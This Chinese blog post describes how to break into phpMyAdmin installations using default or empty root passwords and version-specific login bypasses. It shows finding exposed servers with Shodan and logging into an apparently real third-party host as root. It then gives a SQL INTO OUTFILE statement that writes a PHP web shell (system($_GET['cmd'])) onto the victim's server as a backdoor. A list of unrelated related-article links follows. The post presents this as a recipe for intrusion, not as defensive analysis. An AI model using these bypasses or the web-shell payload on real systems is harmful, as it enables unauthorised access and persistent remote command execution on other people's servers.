phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
php header Content-Type类型小结
Jul 03 PHP
PHP中strtotime函数使用方法分享
Jan 10 PHP
探讨多键值cookie(php中cookie存取数组)的详解
Jun 06 PHP
PHP使用PHPMailer发送邮件的简单使用方法
Nov 12 PHP
浅析ThinkPHP中execute和query方法的区别
Jun 13 PHP
PHP中使用imagick生成PSD文件缩略图教程
Jan 26 PHP
PHP实现页面静态化的超简单方法
Sep 06 PHP
php实现的简单数据库操作Model类
Nov 16 PHP
Win7环境下Apache连接MySQL提示连接已重置的解决办法
May 09 PHP
php批量修改表结构实例
May 24 PHP
使用YII2框架实现微信公众号中表单提交功能
Sep 04 PHP
PHP pthreads v3下的Volatile简介与使用方法示例
Feb 21 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
PHP中使用curl入门教程
2015/07/02 PHP
浅谈PHP中其他类型转化为Bool类型
2016/03/28 PHP
Yii2简单实现多语言配置的方法
2016/07/23 PHP
PHP通过文件路径获取文件名的实例代码
2018/10/14 PHP
PHP进阶学习之依赖注入与Ioc容器详解
2019/06/19 PHP
PHP 命名空间和自动加载原理与用法实例分析
2020/04/29 PHP
javaScript 简单验证代码(用户名,密码,邮箱)
2009/09/28 Javascript
javascript Demo模态窗口
2009/12/06 Javascript
js中function()使用方法
2013/12/24 Javascript
浅谈jQuery.easyui的datebox格式化时间
2015/06/25 Javascript
JS实现的网页背景闪电闪烁效果代码
2015/10/17 Javascript
canvas知识总结
2017/01/25 Javascript
JS自定义函数实现时间戳转换成date的方法示例
2017/08/27 Javascript
JS实现动态生成html table表格的方法分析
2018/07/11 Javascript
node+multer实现图片上传的示例代码
2020/02/18 Javascript
jQuery实现全选按钮
2021/01/01 jQuery
Java实现的执行python脚本工具类示例【使用jython.jar】
2018/03/29 Python
python矩阵/字典实现最短路径算法
2019/01/17 Python
Python爬虫之UserAgent的使用实例
2019/02/21 Python
pyQT5 实现窗体之间传值的示例
2019/06/20 Python
python正则表达式匹配IP代码实例
2019/12/28 Python
python 实现倒计时功能(gui界面)
2020/11/11 Python
人力资源部副职的竞聘演讲稿
2014/01/07 职场文书
应用化学专业职业生涯规划书
2014/01/22 职场文书
80后职场人的职业生涯规划
2014/03/08 职场文书
升国旗仪式主持词
2014/03/19 职场文书
家长对孩子的评语
2014/04/18 职场文书
节约能源标语
2014/06/17 职场文书
“向国旗敬礼”活动策划方案(4篇)
2014/09/27 职场文书
论文答谢词
2015/01/20 职场文书
实习生个人总结范文
2015/02/28 职场文书
2015年材料员工作总结
2015/04/30 职场文书
企业法人任命书
2015/09/21 职场文书
2019学校请假条格式及范文
2019/06/25 职场文书
MySQL如何解决幻读问题
2021/08/07 MySQL
在Python 中将类对象序列化为JSON
2022/04/06 Python